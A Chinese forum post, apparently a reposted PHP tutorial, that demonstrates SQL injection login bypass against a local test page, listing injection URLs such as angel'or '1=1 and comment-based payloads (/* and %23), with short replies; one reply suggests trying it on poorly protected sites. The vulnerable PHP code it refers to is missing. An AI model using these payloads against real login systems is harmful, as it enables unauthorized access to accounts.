一个php登陆注入小示例
在学学习php的过程中肯定会听说过sql注入,简单的讲就是利用后台的sql代码漏洞来进行一些非法的操作。比如:利用后台代码的漏洞来登陆,用户不用知道真实的用户名和密码也能通过表单提交数据来登陆后台成功。我们拿一个用户验证的例子,首先建立一个数据库和一个数据表并插入一条记录,如下:
create table `user` (
`userid` int(11) not null auto_increment,
`username` varchar(20) not null default '',
`password` varchar(20) not null default '',
primary key (`userid`)
) type=myisam auto_increment=3 ;
#
# 导出表中的数据 `user`
#
insert into `user` values (1, 'angel', 'mypass');
验证用户文件的代码如下:
php代码:
这时我们提交:
http://127.0.0.1/injection/user.php?username=angel'or 1=1
就会返回:
warning: mysql_fetch_array(): supplied argument is not a valid mysql result resource in f:wwwinjectionuser.php on line 13
登陆失败
sql query:select * from user where username='angel' or 1=1' and password='
php warning: mysql_fetch_array(): supplied argument is not a valid mysql result resource in f:wwwinjectionuser.php on line 13
看到了吗?单引号闭合后,并没有注释掉后面的单引号,导致单引号没有正确配对,所以由此可知我们构造的语句不能让mysql正确执行,要重新构造:
http://127.0.0.1/injection/user.php?username=angel'or '1=1
这时显示“登陆成功”,说明成功了。或者提交:
http://127.0.0.1/injection/user.php?username=angel'/*
http://127.0.0.1/injection/user.php?username=angel'%23
这样就把后面的语句给注释掉了!说说这两种提交的不同之处,我们提交的第一句是利用逻辑运算,在asp中运用可以说是非常广泛的,这个不用说了吧?第二、三句是根据mysql的特性,mysql支持/*和#两种注释格式,所以我们提交的时候是把后面的代码注释掉,值得注意的是由于编码问题,在ie地址栏里提交#会变成空的,所以我们在地址栏提交的时候,应该提交%23,才会变成#,就成功注释了,这个比逻辑运算简单得多了,由此可以看出php比asp强大灵活多了。
详细原文地址:http://www.phpnewer.com/index.php/dmaq/detail/id/202
------解决方案--------------------
呵呵呵呵呵呵呵
------解决方案--------------------
多谢分享
------解决方案--------------------
文章太老,过时了!
------解决方案--------------------
昨天才发布的文章就过时了???
探讨
文章太老,过时了!
------解决方案--------------------
确实是个老方法了,再在可以很轻易的屏蔽掉你这些注释符;与错误时输出的信息
不过对检查不严格的网站可以一试
------解决方案--------------------
单引号 过滤掉 你还能怎么着
------解决方案--------------------
这种之前看过。
这只是单一的get提交法。还有post提交法
------解决方案--------------------
这个广告男,不停的广告.
------解决方案--------------------
貌似现在许多都屏蔽呢,呵呵
------解决方案--------------------
还好,志在参与嘛